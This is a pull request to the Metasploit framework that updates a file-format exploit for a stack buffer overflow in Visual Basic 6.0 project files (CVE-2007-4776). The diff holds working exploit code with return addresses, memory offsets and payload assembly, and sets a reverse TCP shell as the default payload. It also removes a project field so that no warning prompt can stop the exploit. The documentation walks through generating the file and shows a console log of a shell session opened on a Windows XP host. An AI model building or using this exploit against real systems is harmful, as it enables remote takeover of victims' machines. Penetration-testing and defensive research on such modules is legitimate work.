### PR TITLE
exploit/windows/fileformat/ms_visual_basic_vbp: Add offsets, cleanup, document

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/ms_visual_basic_vbp.md
+++ b/documentation/modules/exploit/windows/fileformat/ms_visual_basic_vbp.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual Basic
+6.0. A specially crafted Visual Basic Project (VBP) file containing
+a long reference line can be used to execute arbitrary code.
+
+This module has been tested successfully on:
+
+* Windows XP Home SP0 (x86) (English)
+* Windows XP Professional SP0 (x86) (English)
+* Windows XP Professional SP1 (x86-64) (English)
+* Windows XP Professional SP2 (x86-64) (English)
+* Windows XP Professional SP3 (x86) (English)
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/ms_visual_basic_vbp`
+1. Do: `set filename [filename.vbp]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run`
+1. Do: `use exploit/multi/handler`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run -jz`
+1. Open `/home/user/.msf4/local/msf.vbp` on a vulnerable system
+
+## Options
+
+### FILENAME
+
+The project file name. (Default: `msf.vbp`).
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/fileformat/ms_visual_basic_vbp
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Windows XP SP0-SP3 (x86) (English)
+    1   Windows XP SP1-SP2 (x86-64) (English)
+
+
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > run
+[*] Creating 'msf.vbp' file for Windows XP SP0-SP3 (x86) (English) ...
+[+] msf.vbp stored at /home/user/.msf4/local/msf.vbp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(multi/handler) > run -jz
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf6 exploit(multi/handler) > mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+[*] exec: mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+
+msf6 exploit(multi/handler) > 
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1037) at 2025-06-21 08:03:44 -0400
+
+msf6 exploit(multi/handler) > sessions -i 1
+[*] Starting interaction with 1...
+
+
+Shell Banner:
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Documents and Settings\Administrator\Desktop>
+```

--- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
+++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb
@@ -12,21 +12,28 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Microsoft Visual Basic VBP Buffer Overflow',
+        'Name' => 'Microsoft Visual Basic VBP Stack Buffer Overflow',
         'Description' => %q{
-          This module exploits a stack buffer overflow in Microsoft Visual
-          Basic 6.0. When a specially crafted vbp file containing a long
-          reference line, an attacker may be able to execute arbitrary
-          code.
+          This module exploits a stack buffer overflow in Microsoft Visual Basic
+          6.0. A specially crafted Visual Basic Project (VBP) file containing
+          a long reference line can be used to execute arbitrary code.
         },
         'License' => MSF_LICENSE,
-        'Author' => [ 'MC' ],
+        'Arch' => [ARCH_X86],
+        'Author' => [
+          'Koshi',  # Discovery and exploit
+          'MC',     # Metasploit
+          'bcoles', # Offsets for XP x86-64
+        ],
         'References' => [
           [ 'CVE', '2007-4776' ],
+          [ 'CWE', '119' ],
+          [ 'EDB', '4361' ],
           [ 'OSVDB', '36936' ],
           [ 'BID', '25629' ]
         ],
         'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp',
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => true
         },
@@ -38,38 +45,66 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Platform' => 'win',
         'Targets' => [
-          [ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ],
+          [
+            'Windows XP SP0-SP3 (x86) (English)', {
+              'Ret' => 0x0fabd271, # call esp ; vba6.dll
+              'Scratch' => 0x7ffddfb4 # Address=0x7ffdd000; Size=0x1000; Access=RW; InitialAccess=RW
+            }
+          ],
+          [
+            'Windows XP SP1-SP2 (x86-64) (English)', {
+              'Ret' => 0x0fabd271, # call esp ; vba6.dll
+              'Scratch' => 0x7efa9010 # Address=0x7efa9000; Size=0x1000; Access=RW; InitialAccess=RW
+            }
+          ],
         ],
         'Privileged' => false,
         'DisclosureDate' => '2007-09-04',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
       )
     )
 
     register_options(
       [
-        OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']),
+        OptString.new('FILENAME', [true, 'The project file name.', 'msf.vbp']),
       ]
     )
   end
 
   def exploit
-    sploit = rand_text_alpha_upper(496) + [target.ret].pack('V')
-    sploit << rand_text_alpha_upper(12) + [target['Scratch']].pack('V')
-    sploit << make_nops(24) + payload.encoded
+    form_name = "Form#{rand(1..9)}"
+
+    sploit = rand_text_alpha_upper(496)
+    sploit << [target.ret].pack('V')
+    sploit << rand_text_alpha_upper(12)
+    sploit << [target['Scratch']].pack('V')
+    sploit << make_nops(24)
+    sploit << payload.encoded
 
     vbp = "Type=Exe\r\n"
-    vbp << "Form=Form2.frm\r\n"
-    vbp << "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation"
-    vbp << sploit + "\r\n"
-    vbp << "Startup=\"Form2\"\r\n"
+
+    # We exclude the "Form" field so we don't have to ship a form file (.frm)
+    # along with the project file (.vbp). If the specified form file is not
+    # present within the same directory as the project file, the user is warned
+    # the file does not exist, and is prompted to confirm loading the project.
+    # Selecting "No" halts loading the project and prevents payload execution.
+    # vbp << "Form=#{form_name}.frm\r\n"
+
+    vbp << 'Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation'
+    vbp << "#{sploit}\r\n"
+    vbp << "Startup=\"#{form_name}\"\r\n"
     vbp << "Command32=\"\"\r\n"
-    vbp << "Name=\"Project2\"\r\n"
+    vbp << "Name=\"Project#{rand(1..9)}\"\r\n"
     vbp << "HelpContextID=\"0\"\r\n"
     vbp << "CompatibleMode=\"0\"\r\n"
     vbp << "MajorVer=1\r\n"
-    vbp << "MinorVer=0\r\n"
-    vbp << "RevisionVer=0\r\n"
+    vbp << "MinorVer=#{rand(1..9)}\r\n"
+    vbp << "RevisionVer=#{rand(1..9)}\r\n"
     vbp << "AutoIncrementVer=0\r\n"
     vbp << "ServerSupportFiles=0\r\n"
     vbp << "VersionCompanyName=\"\"\r\n"
@@ -91,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vbp << "[MS Transaction Server]\r\n"
     vbp << "AutoRefresh=1\r\n"
 
-    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    print_status("Creating '#{datastore['FILENAME']}' file for #{target.name} ...")
 
     file_create(vbp)
   end


### PR DESCRIPTION
* Add notes
* Add documentation
* Resolve RuboCop violations
* Update module description
* Use randomisation for some project attributes
* Document existing offsets
* Add offsets for Windows XP x86-64
* Change default payload to `windows/shell/reverse_tcp`

Meterpreter payloads are not supported on Windows systems prior to SP3


* Update author to credit Koshi for initial discovery and exploit

The author has been updated based on the presumption that MC is responsible for the Metasploit module but not original discovery.

This module pre-dates git so there is no public pull request for context.

Secunia and Security Focus both credit Koshi with discovery:
https://web.archive.org/web/20210201035341/https://www.securityfocus.com/bid/25629/info
https://web.archive.org/web/20161229204833/http://secunia.com/advisories/26704/

ExploitDB hosts Koshi's exploit:
https://www.exploit-db.com/exploits/4361

I haven't analysed the original exploit in detail. Koshi's exploit uses `jmp ebp` from `ntdll.dll`, whereas MC's metasploit module uses `call esp` from `vba6.dll`. Although this uses different offsets to the original exploit, we still credit the original author as per Metasploit tradition.


* Remove `Form` attribute from generated VBP file

Refer to code comments. In short, this prevents a popup "yes/no" dialog when opening the file, which halts exploitation if the user selects "No".

Koshi also notes this issue in the original Perl exploit:

```perl
print " +++ Notes: Ship final .VBP file with a .FRM file to avoid  +++\n";
print " +++        warnings in Visual Basic 6.0                    +++\n";
```

Simply removing the `Form` attribute prevents this dialog, increasing the likelihood of successful exploitation.
